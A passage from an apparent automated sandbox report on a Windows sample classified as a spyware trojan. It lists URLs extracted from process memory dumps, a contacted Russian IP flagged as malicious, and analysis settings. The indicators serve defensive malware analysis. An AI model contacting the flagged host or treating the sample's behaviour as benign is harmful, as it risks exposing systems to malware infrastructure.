caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Entity/Id12ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Entity/Id2ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id21ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Entity/Id9caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id8caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/Entity/Id5caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id4caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id7caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id6caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id19ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id15ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://tempuri.org/Entity/Id14VcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002A0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegistercaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Entity/Id6ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.ip.sb/ipfile.exe, 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, grWB27Fb84.exe.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/sccaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id9ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id20caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id21caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id22caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id1ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=caQi43qE17.exe, 0000000A.00000002.366074072.0000000003936000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.000000000296F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000381E000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000383B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.0000000003919000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000373F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000389B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegocaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletioncaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id11caQi43qE17.exe, 0000000A.00000002.364130402.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id12caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id13caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id14caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id15caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NoncecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id17caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id18caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id5ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id19caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnscaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm8DcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id8ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentitycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/soap/envelope/caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://search.yahoo.com?fr=crmas_sfpfcaQi43qE17.exe, 0000000A.00000002.366074072.0000000003936000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.000000000296F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000381E000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000383B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.0000000003919000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000373F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000389B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoorcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      193.233.20.24
                                                                                                                                                      unknownRussian Federation
                                                                                                                                                      8749REDCOM-ASRedcomKhabarovskRussiaRUtrue
                                                                                                                                                      Joe Sandbox Version:37.0.0 Beryl
                                                                                                                                                      Analysis ID:816370
                                                                                                                                                      Start date and time:2023-02-27 21:16:43 +01:00
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 11m 33s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample file name:file.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@15/10@0/1
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 20.2% (good quality ratio 19.3%)
                                                                                                                                                      • Quality average: 85%
                                                                                                                                                      • Quality standard deviation: 24%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                                      • Number of executed functions: 147
                                                                                                                                                      • Number of non-executed functions: 146
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      TimeTypeDescription
